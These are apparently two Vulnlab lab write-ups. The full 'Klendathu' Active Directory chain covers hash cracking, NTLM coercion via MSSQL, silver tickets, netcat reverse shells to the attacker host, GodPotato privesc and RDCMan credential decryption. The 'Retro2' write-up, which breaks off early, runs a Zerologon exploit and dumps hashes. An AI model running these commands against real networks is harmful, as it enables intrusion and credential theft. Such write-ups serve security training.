vulnlab-klendathu

vulnlab-klendathu

Klendathu, an insane rated AD chain.

solved with , a nfs share containing a config file with password hash of zim@klendathu,vl, having guest access on MSSQL service, forcing authentication with sys.dm_os_file_exist , forging silver ticket then escalating privileges on SRV1, spoofing domain user on SRV2 with the MSSQL user and then using  ntdissector , a swiss army knife for your NTDS.dit files, and decrypting RDCMan credentials with domain backup key using rdgdec.py

.

.

NFS Enum

$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *

.

$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares

.

(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg           
Switch344#show running-config
Building configuration...
Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO 
snmp-server contact ZIM@KLENDATHU.VL
!
end
Switch344#

.

$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v          

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v  Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds

.

$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt  --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22

.

$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.149   445    DC1              [*] Enumerated shares
SMB         10.10.220.149   445    DC1              Share           Permissions     Remark
SMB         10.10.220.149   445    DC1              -----           -----------     ------
SMB         10.10.220.149   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.220.149   445    DC1              C$                              Default share
SMB         10.10.220.149   445    DC1              HomeDirs        READ            
SMB         10.10.220.149   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.220.149   445    DC1              NETLOGON        READ            Logon server share
SMB         10.10.220.149   445    DC1              SYSVOL          READ            Logon server share

.

$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares 
SMB         10.10.220.150   445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.150   445    SRV1             [+] KLENDATHU.VL\zim:football22 
SMB         10.10.220.150   445    SRV1             [*] Enumerated shares
SMB         10.10.220.150   445    SRV1             Share           Permissions     Remark
SMB         10.10.220.150   445    SRV1             -----           -----------     ------
SMB         10.10.220.150   445    SRV1             ADMIN$                          Remote Admin
SMB         10.10.220.150   445    SRV1             C$                              Default share
SMB         10.10.220.150   445    SRV1             IPC$            READ            Remote IPC

.

$ impacket-smbclient zim@dc1.klendathu.vl   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Bloodhound Enum

$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip        
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip

MSSQL access

We have MSSQL running on SRV1, so check if we can login there

$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL       10.10.220.150   1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL       10.10.220.150   1433   SRV1             [+] KLENDATHU.VL\zim:foo<redacted>22 

.

$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
        
-----   
guest   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     1                         1   

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists   
-----------   -------------------   -----------------------   
          0                     0                         0   

SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists   
-----------   -------------------   -----------------------   
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)> 

we are guest, but we can use SELECT * FROM sys.dm_os_file_exists to find (with responder) the hash of the service account used to start the mssql service

responder -I tun0

[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00

.

$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt  --force 
hashcat (v6.2.6) starting

 this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99

Forging Silver Ticket

The mssql service is running as RASCZAK user so we create a silver ticket for him.

ldapdump

$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99' 
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

to get the domain sid

$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK		Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131

convert the plain text pasword into nthash

$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4  
MD4(stdin)= e2<redacted>2c


create the silver ticket

$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache

when on mssql shell 1st run:

# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Verify we have SeImpersonatePrivilege
> xp_cmdshell "whoami /priv"

.

$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)> 
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output                                                                             
--------------------------------------------------------------------------------   

PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe    

PS C:\Windows\system32>                                                            

SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"

getting the reverse shell

$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                         
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131

godpotato for privesc

PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092

getting the elevated reverse shell

$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1

.

PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.
C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}

Spoofing Domain Users On GSSAPI Authentication

Checking Bloodhound outbound control on RASCZAK , we have GenericWrite and ForeChangePassword on two domain users, rico and ibanez , with this ACL we can change the password using rpcclient or net rpc

$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"

verifying creds

$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\ibanez:Summer2024!

There’s a research done by Ceri Coburn from Pen Test Partners, where linux servers joined to AD have misconfiguration in the authentication mechanism where name-type, enterprise is used (NT_ENTERPRISE), if we have GenericWrite on a domain user, we can edit the userPrincipalName attribute, this attribute is utilized by NT_ENTERPRISE through which we can spoof domain users To abuse this we need to first identify the user that we’ll spoof, there’s a group named LINUX_ADMINS with two members flores and leivy

Then adding userPrincpalName to be any of the two users, for adding this attribute we can use ldapmodify for that we need to create a ldif file

$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"

.

$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy

verify if ldap attribute is added/changed correctly

$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName
userPrincipalName: leivy

tried Rubeus, but this did not work for me.

c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED: 

Next i found how to Add -principal option to getTGT.py

.

(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git  
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py . 
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache

.

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache                                      
                                                                                                        
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 08/30/2024 16:21:33

We need to modify our  /etc/krb5.conf

[libdefaults]
    default_realm = KLENDATHU.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

# The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false

[realms]
    KLENDATHU.VL = {
        kdc = dc1.klendathu.vl
        admin_server = dc1.klendathu.vl
    }

[domain_realm]
    .klendathu.vl = KLENDATHU.VL
    klendathu.vl = KLENDATHU.VL

Now we can ssh using Kerberos authentication to srv2

after becoming root we we go in /root/inc5543_domaincontroller_backup/

and transfer this backup to our kali box

(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendathu.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}

[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt 
Incident: INC5543

I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]# 

transfer /tmp/krb5cc_990001135  file to kali

Decrypting RDCMan password

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135                                  
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
    renew until 09/05/2024 16:37:51
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip

.

Decrypt a .rdg password using ntdissector and dpapilab

We tranfers the content of  ‘HomeDirs/JENKINS’ : to our kali box

we unzip AppData_Roaming_Backup.zip , and cat jenkins.rdg

<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>

So we have a encrypted password

After extracting the .zip wealso  have  the path of master keys “./Roaming/Microsoft/Protect”

Next i used a  Ubuntu box to do this decrypting

.

puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR]
                   [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent]
                   [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help            show this help message and exit
  -V, --version         Display version info

Examples:

> Dump users, groups and domain backup keys
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret

> Dump all records from the database
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all

> Dump user objects and include deleted records
$ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel

> List object classes available to filter records
$ ntdissector -ntds NTDS.dit  -filters
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/t
est -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes :  ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|███████████████████████████████████████████████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████████████████████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$

.

(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$

rdgdecrypt

(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key
[+] Profile:  KLENDATHU\administrator
    Username: administrator
    Domain:   KLENDATHU
    Password: @@M<redacted>s@@
-------------------------------------------------------------------------------
[+] Decrypted 1 out of 1 credentials

 

What a ride !

used links:

https://github.com/ar0x4/impacket.git

https://github.com/synacktiv/ntdissector

https://github.com/tijldeneut/dpapilab-ng

.

 

 

 

 

 

 

 

 

vulnlab-retro2

vulnlab-retro2

Retro2 is an easy old-school Windows 2008 DC , that involves decrypting MSAccess database, Pre-Created Computer Accounts, GenericWrite, AddMember & Perfusion.exe

nmap scan

# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16
Nmap scan report for 10.10.122.16
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-08-28T09:42:17+02:00
| smb2-time: 
|   date: 2024-08-28T07:42:18
|_  start_date: 2024-08-28T07:40:52
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds

 

unintended zerologon

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

netexec

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::

enumerate SMB shares

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16         
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares 
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\puck: 
SMB         10.10.122.16    445    BLN01            [*] Enumerated shares
SMB         10.10.122.16    445    BLN01            Share           Permissions     Remark
SMB         10.10.122.16    445    BLN01            -----           -----------     ------
SMB         10.10.122.16    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.122.16    445    BLN01            C$                              Default share
SMB         10.10.122.16    445    BLN01            IPC$                            Remote IPC
SMB         10.10.122.16    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.122.16    445    BLN01            Public          READ            
SMB         10.10.122.16    445    BLN01            SYSVOL                          Logon server share 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-smbclient guest@retro2.vl -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
